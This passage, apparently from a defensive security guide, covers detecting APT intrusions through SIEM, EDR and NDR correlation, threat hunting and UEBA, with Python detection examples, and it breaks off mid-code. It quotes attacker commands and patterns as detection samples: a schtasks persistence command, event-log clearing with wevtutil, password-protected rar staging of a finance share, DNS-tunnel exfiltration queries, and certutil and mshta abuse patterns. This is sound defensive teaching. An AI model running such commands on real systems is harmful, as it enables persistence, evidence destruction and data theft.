The business logic of an APT: why the attacker stays in the network for months
Before taking detection tooling apart, you need to understand the motivation. An APT group is not an opportunistic hacker with a ransomware kit. For an advanced persistent threat, the intrusion is a long-term operation with a specific goal: industrial espionage, preparation for sabotage of critical infrastructure, or theft of intellectual property. The financial impact goes far beyond direct losses.
The key difference between an APT and a mass campaign is that at every stage of the kill chain the attackers adapt to the victim's specific infrastructure. They study which SIEM rules are tuned, which EDR agents sit on the hosts, and where the gaps in network monitoring are. According to IBM X-Force's 2024 report, attacks using valid credentials grew 71% year-on-year. Attackers prefer not to break in but to walk through the front door. The Valid Accounts technique (T1078) spans four MITRE ATT&CK tactics: Initial Access, Persistence, Privilege Escalation and Defense Evasion.
That is why detecting APT attacks does not boil down to one product. It requires the coordinated work of several layers, endpoint, network and identity, with unified correlation and proactive threat hunting.
A detailed analysis of the motivation and tactics of modern APT groups using AI automation is in our guide: AI Ransomware 2026: the Tactics from the M-Trends and Arctic Wolf reports for the pentesters
SIEM for threat detection: why 4,500 alerts per day paralyze a SOC
SIEM is the central nervous system of the SOC. Splunk Enterprise Security, Microsoft Sentinel, MaxPatrol SIEM: they all aggregate logs from dozens of sources and apply correlation rules to detect attack chains. The problem is not a lack of data but its volume: a typical corporate SIEM generates more than 4,500 alerts a day. Triaging that manually is the road to analyst burnout and missed incidents.
What SIEM sees and what it doesn't
SIEM is good at detecting known patterns: mass logons from one account to different hosts (lateral movement), creation of a scheduled task with a suspicious path (schtasks /create /tn Update /tr C:\ProgramData\update.ps1), clearing of event logs via wevtutil cl Security or Clear-EventLog (T1070.001). Correlating Windows Security Event ID 4624 (successful logon) + Event ID 4698 (scheduled task created) + an outgoing connection to a newly registered domain is the basic detection scenario for persistence plus a C2 channel. One caveat: 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, and 4688 only carries the command line when "Include command line in process creation events" is on; without those settings the rule has nothing to match.
The SIEM blind zone is attacks that do not generate characteristic logs. If the attacker uses powershell.exe (T1059.001) with obfuscation (T1027) and connects to a legitimate cloud service (Google Sheets, OneDrive) instead of a dedicated C2 server, standard correlation rules will not fire. Such scenarios need custom Sigma rules tied to the specific cloud APIs.
Checklist: 5 signs that your SIEM does not detect APT
1. There are no correlation rules for living-off-the-land techniques (PowerShell, WMI, MSHTA)
2. DNS logs are not correlated with threat intelligence feeds (MISP, OpenCTI)
3. There is no monitoring of access to cloud APIs (OneDrive, Google Drive, Slack) for C2 communications
4. Rules trigger only on IOCs (hashes, IPs), not on IOAs (behavioral anomalies)
5. There is no automatic enrichment of alert context with EDR telemetry
If you scored 3 or more, your SIEM is effectively blind to targeted attacks. It is time to rewrite the rules.
Detailed Sigma rules for detecting cloud C2 channels: APT Detecting Through Cloud C2 Channels: Sigma and YARA Rules for Google Sheets, OneDrive and Slack
Sigma detections for network equipment, including an exfiltration channel via NETCONF: Sigma Detection Rules Cisco SD-WAN
EDR protection against APT: endpoint telemetry as the foundation of detection
EDR (CrowdStrike Falcon, SentinelOne Singularity, Elastic Security) is the first line of detection at the endpoint. The agent on the host records process starts, network connections, file and registry modifications, and DLL loads. This telemetry is critical for detecting techniques that SIEM simply will not see: Process Injection (T1055), OS Credential Dumping (T1003), disabling of security tools (T1562.001).
Vendor specifics: where detection breaks
Not all EDRs are the same, and that is not marketing but architectural reality.

The architecture of telemetry collection determines which techniques an EDR can see. Agents based on user-mode hooks can be bypassed with direct or indirect syscalls. Agents that consume kernel-level ETW-TI (CrowdStrike, Elastic 8.x+) catch these bypasses but have limitations on Linux hosts, where eBPF-based monitoring does not cover every system call. I have seen situations where an eBPF agent missed a whole class of syscalls on old kernels, and the result was silence while the attacker quietly collected credentials.
A detailed analysis of Linux agent architecture with a map of blind spots: Linux EDR from the inside: how agents collect telemetry and where they have blind spots
Limitations of EDR that are rarely discussed
EDR does not see traffic between hosts that have no agent (printers, IoT, network equipment). EDR does not detect DNS tunneling; that needs NDR. EDR is powerless when the attacker uses only valid credentials and standard administration tools without spawning suspicious processes.
EDR is a necessary but not sufficient layer. Just one of several.
NDR and network threat detection: what only traffic reveals
Network Detection and Response closes the fundamental gap: everything that passes over the network but leaves no trace on endpoints. NDR solutions (Darktrace, Vectra AI, PT Network Attack Discovery) analyze network traffic in real time and surface anomalies through behavioral analysis and machine learning.
3 scenarios where NDR is indispensable
Scenario 1: C2 over Application Layer Protocol (T1071). The attacker disguises command traffic as HTTPS requests to legitimate services. EDR only sees the process that opened the connection. NDR analyzes the traffic pattern: the regularity of beacon intervals, the volume of data transferred, JA3/JA4 TLS fingerprints. A regular beacon every 60 seconds to an IP in an AS unrelated to the claimed service is a classic NDR detection.
Scenario 2: Lateral movement over SMB/RDP without malware. The attacker uses PsExec or plain RDP with stolen credentials; EDR on the target host may see no anomaly, only legitimate processes. NDR catches the uncharacteristic pattern: an accountant's workstation connecting over SMB to the domain controller at 3:00 and pulling 2 GB of data. An accountant pulling 2 GB from a DC at three in the morning is wrong even without ML.
Scenario 3: Exfiltration through DNS tunnels. Data is encoded into the subdomains of queries to an attacker-controlled domain. On the host it looks like ordinary DNS queries. NDR detects the anomaly: thousands of queries for subdomains with randomized names, high string entropy, an uncharacteristic volume of DNS traffic from a single host.
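Scenarios 1 and 3 as detection logic, added here as an example in Python rather than code from the article or from any NDR product: a beacon test on flow records (regularity of the gaps between connections) and a DNS-tunnel test on query logs (length and Shannon entropy of the leftmost label). The flow and DNS records are constructed; the 203.0.113.0/24 and 198.51.100.0/24 addresses and exfil-example.net are documentation placeholders, and every threshold is an assumption to be tuned against your own baseline.

```python
import base64
import hashlib
import math
import statistics
from collections import defaultdict

# --- constructed sample data (not captured traffic) ----------------------
# Flow record: (timestamp_s, src_ip, dst_ip, dst_port, bytes_out)
FLOWS = []
for t in (0, 61, 119, 181, 240, 299, 362, 418, 481, 539):   # ~60 s beacon, small jitter
    FLOWS.append((t, "10.0.0.5", "203.0.113.7", 443, 1200))
for t in (0, 5, 7, 90, 95, 400, 402, 910, 915, 1300):       # ordinary browsing, bursty
    FLOWS.append((t, "10.0.0.9", "198.51.100.20", 443, 48000))

# DNS record: (src_ip, query_name). The tunnelling host encodes data in long
# base32 leftmost labels; the benign host resolves a few ordinary names.
DNS_QUERIES = []
for i in range(25):
    chunk = base64.b32encode(hashlib.sha256(f"chunk{i}".encode()).digest())
    DNS_QUERIES.append(("10.0.0.5", chunk.decode().rstrip("=").lower() + ".exfil-example.net"))
for i in range(25):
    DNS_QUERIES.append(("10.0.0.9", ("www.example.com", "mail.example.com", "cdn.example.com")[i % 3]))


def beacon_candidates(flows, min_conns=8, max_cv=0.15):
    """Flag (src, dst, port) pairs whose inter-connection gaps are suspiciously
    regular: coefficient of variation (stdev / mean) at or below max_cv.
    Caveat: C2 frameworks add jitter; 20% uniform jitter gives a CV of about
    0.115, so the threshold must stay above that or the rule goes blind."""
    by_pair = defaultdict(list)
    for ts, src, dst, port, _ in flows:
        by_pair[(src, dst, port)].append(ts)
    hits = []
    for pair, times in by_pair.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append({"pair": pair, "interval_s": round(mean, 1),
                         "cv": round(cv, 3), "connections": len(times)})
    return hits


def shannon_entropy(s):
    """Bits per character of the string s (0 for a constant string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dns_tunnel_candidates(queries, min_queries=20, min_label_len=30, min_entropy=3.5,
                          allowlist=frozenset()):
    """Flag (src, registered domain) pairs with many queries whose leftmost label
    is long and high-entropy. The registered domain is approximated as the last
    two labels; production code should use the public suffix list. Some legitimate
    services (AV cloud lookups, CDNs) look exactly like this, hence the allowlist."""
    by_key = defaultdict(list)
    for src, qname in queries:
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue
        domain = ".".join(labels[-2:])
        if domain in allowlist:
            continue
        by_key[(src, domain)].append(labels[0])
    hits = []
    for (src, domain), labels in by_key.items():
        if len(labels) < min_queries:
            continue
        avg_len = statistics.mean(len(l) for l in labels)
        avg_ent = statistics.mean(shannon_entropy(l) for l in labels)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            hits.append({"src": src, "domain": domain, "queries": len(labels),
                         "unique_labels": len(set(labels)),
                         "avg_label_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2)})
    return hits


if __name__ == "__main__":
    for h in beacon_candidates(FLOWS):
        print("beacon:", h)
    for h in dns_tunnel_candidates(DNS_QUERIES):
        print("dns tunnel:", h)
```

A beacon with heavy jitter defeats the coefficient-of-variation test, which is why an NDR also weighs connection count, payload size and the JA3/JA4 fingerprint against the destination's claimed service; and a DNS rule like this must ship with an allowlist, because antivirus cloud lookups and some CDNs legitimately produce long, high-entropy labels.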
Exotic exfiltration channels go beyond the network; a detailed analysis of steganographic techniques: Steganography in audio files: how data is hidden inside WAV and how to detect it
SIEM + EDR + NDR integration: why XDR is not marketing but a necessity
Isolated tools produce a fragmented picture. SIEM sees logs, EDR sees processes on hosts, NDR sees network anomalies. A real APT attack chain runs through all three layers at once, and correlation across them is the only way to separate a true positive from noise.
Example of end-to-end correlation
Here is what detecting an APT operation looks like when all three layers work together:
1. NDR detects an anomalous HTTPS beacon, every 45 seconds, to an IP in an AS owned by a bulletproof hoster
2. EDR (CrowdStrike Falcon) on the source host shows powershell.exe launched with -EncodedCommand, parent process excel.exe (the phishing document)
3. SIEM (Splunk) correlates: 10 minutes before the PowerShell launch, the mail gateway logged an inbound message with an .xlsm attachment from a newly registered domain
4. SIEM enriches the event with MISP data: the sender domain matches an IOC from a recent TI report
5. Automated response: host isolation via the EDR API, blocking the IP on the perimeter firewall
Without linking the three layers, each individual alert is low priority: "suspicious PowerShell" (thousands per day), "unusual HTTPS traffic" (hundreds per day), "email with a macro" (tens per day). Together they are a confirmed incident with a complete attack chain.
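The chain above as a correlation routine, an example added here in Python (not the article's code and not Splunk, Falcon or MISP API code): alerts from the mail gateway, EDR and NDR are joined per host inside a 30-minute window, enriched against a MISP-style indicator set and scored, so that the three individually low-priority alerts on WS-0417 become one high-severity incident while a lone encoded-PowerShell alert on an admin host stays low. The alerts, hostnames, indicators and weights are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed alerts from three layers; none is high priority on its own.
ALERTS = [
    {"src": "mail", "ts": "2026-03-02T09:12:00", "host": "WS-0417", "user": "j.doe",
     "detail": "inbound .xlsm attachment from newly registered domain",
     "sender_domain": "invoice-portal-example.net", "domain_age_days": 3},
    {"src": "edr", "ts": "2026-03-02T09:22:10", "host": "WS-0417", "user": "j.doe",
     "detail": "powershell.exe -EncodedCommand, parent excel.exe",
     "image": "powershell.exe", "parent": "excel.exe"},
    {"src": "ndr", "ts": "2026-03-02T09:23:05", "host": "WS-0417",
     "detail": "HTTPS beacon every 45 s to bulletproof-hosted IP",
     "dst_ip": "203.0.113.7", "interval_s": 45},
    # Noise: encoded PowerShell from cmd.exe on an admin box, no mail or network context.
    {"src": "edr", "ts": "2026-03-02T09:30:00", "host": "ADM-01", "user": "svc_admin",
     "detail": "powershell.exe -EncodedCommand, parent cmd.exe",
     "image": "powershell.exe", "parent": "cmd.exe"},
]

# What a MISP feed would contribute (constructed; documentation IP range).
MISP_IOCS = {"domains": {"invoice-portal-example.net"}, "ips": {"203.0.113.7"}}

LAYER_WEIGHT = {"mail": 1, "edr": 2, "ndr": 2}   # assumption: endpoint and network evidence outweigh mail
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def correlate(alerts, iocs, window=timedelta(minutes=30)):
    """Group alerts per host, take the window that spans the most distinct layers,
    enrich with IOCs, and score. Returns incidents sorted by score, highest first."""
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["host"]].append({**a, "t": datetime.fromisoformat(a["ts"])})

    incidents = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["t"])
        best_chain, best_layers = [], set()
        for i, start in enumerate(evs):                 # sliding window anchored on each alert
            chain = [e for e in evs[i:] if e["t"] - start["t"] <= window]
            layers = {e["src"] for e in chain}
            if len(layers) > len(best_layers):
                best_chain, best_layers = chain, layers

        score = sum(LAYER_WEIGHT[l] for l in best_layers)
        ioc_hits = [e["sender_domain"] for e in best_chain if e.get("sender_domain") in iocs["domains"]]
        ioc_hits += [e["dst_ip"] for e in best_chain if e.get("dst_ip") in iocs["ips"]]
        score += 2 * len(ioc_hits)
        if any(e.get("parent") in OFFICE_APPS for e in best_chain):   # office app spawning a shell is a strong IOA
            score += 2

        if len(best_layers) >= 3 or score >= 6:
            severity = "high"
        elif len(best_layers) == 2:
            severity = "medium"
        else:
            severity = "low"
        incidents.append({
            "host": host, "layers": sorted(best_layers), "score": score, "severity": severity,
            "iocs": ioc_hits,
            "chain": [f'{e["ts"]} {e["src"]}: {e["detail"]}' for e in best_chain],
            # automated response only on a confirmed multi-layer chain, never on a single alert
            "response": ["isolate host via EDR API", "block C2 IP on perimeter firewall"]
                        if severity == "high" else [],
        })
    return sorted(incidents, key=lambda i: -i["score"])


if __name__ == "__main__":
    for inc in correlate(ALERTS, MISP_IOCS):
        print(inc["severity"].upper(), inc["host"], inc["score"], inc["layers"], inc["response"])
        for line in inc["chain"]:
            print("   ", line)
```

The design point is that automated response is gated on the severity of the chain, not on any single detection: an encoded PowerShell alone never isolates a host, which is what keeps the SOAR playbook from isolating every administrator who runs a one-liner.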
XDR (Extended Detection and Response) formalizes this integration. CrowdStrike Falcon XDR, Microsoft Defender XDR and Palo Alto Cortex XDR combine telemetry from endpoints, network, identity and cloud into a single data lake with cross-domain correlation. The open alternative is the Elastic Security + Zeek + Sigma stack, where correlation is built on the Detection-as-Code approach. Cheaper and more flexible, but it needs hands and heads.
Threat hunting methodology: 3 approaches to threat hunting in 2026
Threat hunting is the proactive search for threats that are already in the infrastructure but have not been detected by automated means. If SIEM and EDR answer the question "what is happening right now", threat hunting answers "what have we missed in the last 30 days".
Unstructured hunting: analyst intuition
Exploratory search based on experience. The analyst notices an anomaly in the data and follows it. Example: an unusually high volume of outgoing DNS traffic from one host outside working hours. It matches no rule, but an experienced SOC analyst knows that this is what DNS tunneling looks like. This intuition is hard to formalize as a rule, yet it is what catches what the machines miss.
Situational hunting: driven by context
Tied to a specific event: publication of a new CVE, a report on an APT group's campaign, an IOC appearing in a TI feed. The analyst takes the indicators from the report and checks whether they occur in historical SIEM/EDR data.
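Situational hunting as a script, added here as an example (not from the article or from MISP/OpenCTI): indicators are extracted from a defanged report excerpt, refanged, and swept across 30 days of historical DNS, connection, mail and file-hash records. The report text, log records, hosts and indicators are constructed; the IP address and domains are documentation placeholders.

```python
import re
from datetime import datetime, timedelta

# Constructed excerpt of a TI report (not a real campaign); indicators are defanged as feeds usually are.
REPORT = """
Campaign notes (constructed sample)
C2 URL: hxxps://update-cdn-example[.]net/api/v2
Exfil server: 203[.]0[.]113[.]45
Loader SHA256: 3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b
Phishing sender: billing[@]invoice-portal-example[.]net
"""


def refang(text):
    """Undo the common defanging conventions so indicators match raw log values."""
    return (text.replace("hxxp", "http").replace("[.]", ".")
                .replace("(.)", ".").replace("[@]", "@").replace("[:]", ":"))


def extract_iocs(report):
    """Pull domains, IPv4 addresses and SHA-256 hashes out of a refanged report."""
    text = refang(report).lower()
    return {
        "domains": set(re.findall(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", text)),
        "ips": set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text)),
        "sha256": set(re.findall(r"\b[a-f0-9]{64}\b", text)),
    }


# Constructed historical records: (timestamp, host, kind, value). In practice these come
# from DNS/proxy logs, firewall connections, EDR file hashes and mail-gateway sender domains.
LOGS = [
    ("2026-02-20T07:55:00", "MAILGW-01", "mail", "invoice-portal-example.net"),
    ("2026-02-20T08:01:00", "WS-0417", "dns", "update-cdn-example.net"),
    ("2026-02-20T08:01:02", "WS-0417", "conn", "203.0.113.45"),
    ("2026-02-25T13:40:00", "WS-0417", "dns", "UPDATE-CDN-EXAMPLE.NET"),
    ("2026-02-26T10:00:00", "FS-02", "hash", "3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b"),
    ("2026-02-21T09:00:00", "WS-0099", "dns", "www.example.com"),
    ("2026-01-05T09:00:00", "WS-0200", "conn", "203.0.113.45"),   # older than the hunt window
]

KIND_TO_IOC = {"dns": "domains", "mail": "domains", "conn": "ips", "hash": "sha256"}


def sweep(logs, iocs, now, days=30):
    """Look back `days` from the ISO timestamp `now` and return, per matched indicator,
    the hosts involved, hit count and first/last seen. Values are lower-cased before
    comparison because log sources disagree on case."""
    since = datetime.fromisoformat(now) - timedelta(days=days)
    hits = {}
    for ts, host, kind, value in logs:
        t = datetime.fromisoformat(ts)
        bucket = KIND_TO_IOC.get(kind)
        if t < since or bucket is None:
            continue
        value = value.lower()
        if value not in iocs[bucket]:
            continue
        h = hits.setdefault(value, {"kind": bucket, "hosts": set(), "count": 0,
                                    "first_seen": t, "last_seen": t})
        h["hosts"].add(host)
        h["count"] += 1
        h["first_seen"] = min(h["first_seen"], t)
        h["last_seen"] = max(h["last_seen"], t)
    return hits


if __name__ == "__main__":
    found = sweep(LOGS, extract_iocs(REPORT), now="2026-03-02T00:00:00")
    for ioc, h in sorted(found.items()):
        print(f'{h["kind"]:8} {ioc}: {h["count"]} hit(s) on {sorted(h["hosts"])} '
              f'{h["first_seen"]:%Y-%m-%d} .. {h["last_seen"]:%Y-%m-%d}')
```

The first-seen timestamp is the output that matters: it tells you how long the indicator has been present before the report arrived, which sets the scope of the incident rather than just confirming a match.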
Tools for all three approaches: APT-Hunter (mapping findings in Windows Event Logs to MITRE ATT&CK), MISP/OpenCTI (IOC sharing and enrichment), Zeek (deep network traffic analysis), YARA (signature matching in files and memory), Sigma (vendor-neutral detection rule format, compiled into SIEM queries). Each is open source, and each covers a specific niche of hunting.
How ML scoring transforms triage, from thousands of alerts to dozens of priority cases: Machine learning in cybersecurity: how ML-scoring has reduced the SOC triage from thousands of alerts to tens
Identity-based attacks and Valid Accounts: the main vector of 2026
IBM X-Force's data is unambiguous: attacks using valid credentials grew 71% in a year. This is not a passing trend; it is a fundamental shift in APT tactics. Why exploit vulnerabilities and risk EDR detection when you can buy stolen credentials on the dark market and log in legitimately?
The Valid Accounts technique (T1078) is one of the hardest to detect, because from the viewpoint of SIEM and EDR it is an ordinary user logging in. Detection rests on behavioral anomalies:

UEBA (User and Entity Behavior Analytics) is the key component for detecting identity-based attacks. Exabeam Fusion, for example, builds a normal-behavior profile for each user and assigns a risk score to deviations. But UEBA is useless without good baseline data: the first 2-3 weeks after deployment are a training period in which the system generates false positives. Patience here is part of the process.
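A minimal UEBA-style baseline and risk score, added here as an example (not Exabeam's or the article's code): a per-user profile of hours, hosts and source countries is learned from historical logons, and each new logon is scored for deviations. The history is constructed so that the same benign logon scores 50 against a 7-day baseline and 10 against a 21-day baseline, which is the training-period effect described above; the user, hosts, countries and point weights are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def make_history(days, start=datetime(2026, 2, 1)):
    """Constructed logon history: (timestamp, user, host, source_country).
    Weekdays at 09:00 and 14:00 on her own workstation; every second Tuesday
    a file server. No weekend activity, nothing from abroad."""
    events = []
    for d in range(days):
        day = start + timedelta(days=d)
        if day.weekday() >= 5:
            continue
        events.append((day.replace(hour=9), "j.doe", "WS-0417", "DE"))
        events.append((day.replace(hour=14), "j.doe", "WS-0417", "DE"))
        if d % 14 == 9:
            events.append((day.replace(hour=11), "j.doe", "FS-02", "DE"))
    return events


def build_profiles(history):
    """Per-user baseline: how often each hour, host and country has been seen."""
    profiles = defaultdict(lambda: {"n": 0, "hours": defaultdict(int), "hosts": defaultdict(int),
                                    "countries": defaultdict(int), "weekend": 0})
    for ts, user, host, country in history:
        p = profiles[user]
        p["n"] += 1
        p["hours"][ts.hour] += 1
        p["hosts"][host] += 1
        p["countries"][country] += 1
        if ts.weekday() >= 5:
            p["weekend"] += 1
    return profiles


def score_logon(profile, ts_iso, host, country):
    """Additive risk points for deviations from the baseline; returns (score, reasons).
    Weights are assumptions; a real UEBA product learns them and decays them over time."""
    ts = datetime.fromisoformat(ts_iso)
    n = profile["n"]
    score, reasons = 0, []
    if host not in profile["hosts"]:
        score += 30
        reasons.append("first logon to this host")
    elif profile["hosts"][host] / n < 0.05:
        score += 10
        reasons.append("rarely used host")
    if profile["hours"].get(ts.hour, 0) == 0:
        score += 20
        reasons.append("never active at this hour")
    if ts.weekday() >= 5 and profile["weekend"] == 0:
        score += 15
        reasons.append("no weekend activity in baseline")
    if country not in profile["countries"]:
        score += 40
        reasons.append("logon from a new country")
    return score, reasons


if __name__ == "__main__":
    benign = ("2026-02-24T11:00:00", "FS-02", "DE")     # her fortnightly file-server visit
    malicious = ("2026-02-24T03:00:00", "DC-01", "RO")  # stolen credentials used at night, from abroad
    for days in (7, 21):
        prof = build_profiles(make_history(days))["j.doe"]
        print(f"{days}-day baseline: benign={score_logon(prof, *benign)}  "
              f"malicious={score_logon(prof, *malicious)}")
```

The malicious logon scores 90 against either baseline, but the benign one drops from 50 to 10 only once the baseline is long enough to contain her fortnightly pattern; until then the analyst is triaging the training period, not an attacker.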
A complete analysis of identity-based techniques with Sigma detection rules: Identity-based attack: how attackers use legitimate accounts and how to detect them
Detecting lateral movement: 62 minutes to stop the attack
After initial access, the APT group begins to move laterally. According to CrowdStrike, the average time from initial access to the first lateral movement is 62 minutes. This is the window in which the SOC team must detect and block the attacker. Miss it, and everything afterwards only gets harder.
Lateral movement is one of the most detectable phases of an APT operation if the tooling is configured correctly. Attackers use PsExec, WMI, RDP and SMB, and each of these leaves characteristic artifacts.
Detection by kill chain position
Initial Access → Lateral Movement:
• Sysmon Event ID 3 (Network Connection) on the source host: outgoing connections to ports 445 (SMB), 135 (RPC/WMI), 3389 (RDP) to hosts the workstation has never communicated with before
• Windows Security Event ID 4624 (LogonType 3, Network) on the target host: logon with an account that has never been used on this host
• NDR: a burst of SMB traffic from one source to several targets in a short interval, a network scanning pattern
Lateral Movement → Data Collection:
• EDR: launch of rar.exe or 7z.exe with a password switch (-hp for rar, -p for 7z), parent process cmd.exe started via PsExec (PSEXESVC)
• SIEM: correlation of data archiving + abnormal outbound traffic to an external IP
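Two of the detections listed above as code, added here as an example (not from the article or from Sysmon): an SMB/RDP fan-out detector over Sysmon Event ID 3 connections and an archive-staging detector over process-creation events that looks for rar/7z with a password switch under a remote-execution parent chain. The events, hosts, users and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque

ADMIN_PORTS = {445: "SMB", 135: "RPC/WMI", 3389: "RDP", 5985: "WinRM"}

# Constructed Sysmon-style events: id 3 = network connection, id 1 = process creation.
EVENTS = [
    # WS-0417 touches seven hosts on 445 within 15 seconds (PsExec / share enumeration pattern)
    *[{"id": 3, "ts": t, "host": "WS-0417", "user": "CORP\\j.doe", "dst": f"10.0.1.{10 + i}", "dport": 445}
      for i, t in enumerate((0, 3, 5, 8, 10, 12, 15))],
    # ADM-01 opens two RDP sessions 100 s apart: ordinary admin work
    {"id": 3, "ts": 0, "host": "ADM-01", "user": "CORP\\adm.lee", "dst": "10.0.1.10", "dport": 3389},
    {"id": 3, "ts": 100, "host": "ADM-01", "user": "CORP\\adm.lee", "dst": "10.0.1.11", "dport": 3389},
    # staging on the file server: rar with header encryption, launched via PsExec service -> cmd
    {"id": 1, "ts": 600, "host": "FS-02", "user": "CORP\\j.doe",
     "image": "C:\\Windows\\Temp\\rar.exe", "parent": "cmd.exe", "grandparent": "PSEXESVC.exe",
     "cmdline": "rar.exe a -hpS3cretPw -r C:\\Windows\\Temp\\fin.rar \\\\FS-02\\Finance\\"},
    # benign backup with 7-Zip, no password, started from Explorer
    {"id": 1, "ts": 700, "host": "WS-0099", "user": "CORP\\m.ross",
     "image": "C:\\Program Files\\7-Zip\\7z.exe", "parent": "explorer.exe", "grandparent": "userinit.exe",
     "cmdline": "7z.exe a D:\\backup\\docs.7z D:\\docs"},
]


def fanout_alerts(events, min_targets=5, window_s=60):
    """Sysmon EID 3: one source host reaching min_targets distinct hosts on admin
    ports inside window_s seconds. Fires once per source; the targets listed are
    those seen at the moment the threshold was crossed."""
    recent = defaultdict(deque)       # src host -> (ts, dst) within the window
    fired, alerts = set(), []
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] != 3 or e.get("dport") not in ADMIN_PORTS:
            continue
        q = recent[e["host"]]
        q.append((e["ts"], e["dst"]))
        while q and e["ts"] - q[0][0] > window_s:
            q.popleft()
        targets = {dst for _, dst in q}
        if len(targets) >= min_targets and e["host"] not in fired:
            fired.add(e["host"])
            alerts.append({"host": e["host"], "user": e["user"], "service": ADMIN_PORTS[e["dport"]],
                           "targets": sorted(targets), "window_s": window_s})
    return alerts


ARCHIVER = re.compile(r"(?:^|\\)(rar|winrar|7z|7za)\.exe$", re.I)
PASSWORD_SWITCH = re.compile(r"\s-(?:hp|p)\S*")       # rar -hp<pwd> / 7z -p<pwd>


def staging_alerts(events):
    """EID 1 / 4688: archiver run with a password switch. A remote-execution parent
    chain (PSEXESVC, wmiprvse, wsmprovhost) is reported as a stronger signal."""
    remote_parents = ("psexesvc", "wmiprvse", "wsmprovhost")
    alerts = []
    for e in events:
        if e["id"] != 1 or not ARCHIVER.search(e["image"]):
            continue
        if not PASSWORD_SWITCH.search(e["cmdline"]):
            continue
        chain = (e.get("parent", "") + " " + e.get("grandparent", "")).lower()
        alerts.append({"host": e["host"], "user": e["user"], "cmdline": e["cmdline"],
                       "via_remote_exec": any(p in chain for p in remote_parents)})
    return alerts


if __name__ == "__main__":
    for a in fanout_alerts(EVENTS):
        print("fan-out:", a)
    for a in staging_alerts(EVENTS):
        print("staging:", a)
```

Both detectors are behavioral, not signature-based: neither cares which binary PsExec-like tooling is, only that one workstation fans out over admin ports and that a password-protected archive appears under a remote-execution parent; an attacker who renames rar.exe still matches on the command-line switch, and one who throttles the sweep below five hosts a minute is the reason the threshold must be tuned per environment rather than copied.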
79% of attacks in 2024 were malware-free: the attackers moved using only standard tools. Detecting lateral movement through legitimate accounts requires behavioral analysis, not signatures. Signatures are useless here.
A detailed guide with Sigma rules for detecting lateral movement without malicious code: Detecting lateral movement through trusted accounts: detecting horizontal movement without malicious code
Living off the Land and evasion techniques: why standard detections break
Living off the Land (LotL) is the use of legitimate system tools for malicious activity. PowerShell.exe, certutil.exe, mshta.exe, wmic.exe: all of these are standard Windows components that cannot simply be blocked in a corporate environment. The LOLBAS catalog (Living Off The Land Binaries and Scripts) lists dozens of such utilities with their specific malicious use cases. certutil.exe maps to T1027.013 (Encrypted/Encoded File), T1105 (Ingress Tool Transfer), T1140 (Deobfuscate/Decode Files or Information) and T1564.004 (NTFS File Attributes); mshta.exe to T1105 and T1218.005 (Mshta); wmic.exe to T1047 (Windows Management Instrumentation) and T1218 (System Binary Proxy Execution).
APT groups combine LotL with evasion techniques:
• Obfuscated Files or Information (T1027): PowerShell scripts are Base64-encoded or use string obfuscation to bypass signature analysis
• Process Injection (T1055): code is injected into a legitimate process (explorer.exe, svchost.exe), hiding malicious activity from EDR
• Disable or Modify Tools (T1562.001): the attacker disables or modifies the EDR agent, Sysmon or Windows Defender
A recent example: in May 2026 Microsoft Threat Intelligence published a technical analysis of the Go-based ransomware "The Gentlemen", deployed by affiliates of the group Storm-2697. The encryptor combines per-file ephemeral encryption with aggressive self-propagation through standard Windows mechanisms. Pure LotL in action.
Checklist: detecting LotL techniques
1. Enable PowerShell logging (Module Logging, Script Block Logging, Transcription)
2. Configure Sysmon with the SwiftOnSecurity or ION-Storm configuration to monitor LOLBAS binaries
3. Build an allowlist of legitimate uses of certutil.exe, mshta.exe and wmic.exe and alert on deviations
4. Monitor Event ID 4688 (Process Creation) with command-line arguments; this requires the extended audit policy ("Include command line in process creation events")
5. Correlate the launch of a LOLBAS binary + a network connection to a non-standard port = high priority
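Items 3 to 5 of the checklist, together with the schtasks and wevtutil patterns from the SIEM section above, as an added example in Python (not from the article, the Sigma project or LOLBAS): rules are written in Sigma's field|modifier selection syntax, a small matcher evaluates them against Sysmon-shaped process events, an allowlist in the same syntax suppresses known-good uses, and a match whose process also connected to a non-standard port is escalated. The events and the parent process patchagent.exe are constructed; the rule and allowlist contents are assumptions to adapt to your environment.

```python
from collections import defaultdict

# Sigma-style rules as Python dicts. Keys use Sigma's field|modifier syntax; keys are ANDed,
# a list is OR unless the |all modifier is present.
RULES = [
    {"title": "certutil download or decode", "tags": ["T1105", "T1140"], "level": "high",
     "selection": {"Image|endswith": "\\certutil.exe",
                   "CommandLine|contains": ["urlcache", "-decode", "-encode", "-decodehex"]}},
    {"title": "mshta with remote or inline script", "tags": ["T1218.005"], "level": "high",
     "selection": {"Image|endswith": "\\mshta.exe",
                   "CommandLine|contains": ["http://", "https://", "javascript:", "vbscript:"]}},
    {"title": "wmic process creation", "tags": ["T1047"], "level": "high",
     "selection": {"Image|endswith": "\\wmic.exe",
                   "CommandLine|contains|all": ["process", "call", "create"]}},
    {"title": "scheduled task pointing into a user-writable path", "tags": ["T1053.005"], "level": "high",
     "selection": {"Image|endswith": "\\schtasks.exe",
                   "CommandLine|contains|all": ["/create"],
                   "CommandLine|contains": ["\\programdata\\", "\\temp\\", "\\appdata\\", "\\users\\public\\"]}},
    {"title": "event log cleared", "tags": ["T1070.001"], "level": "high",
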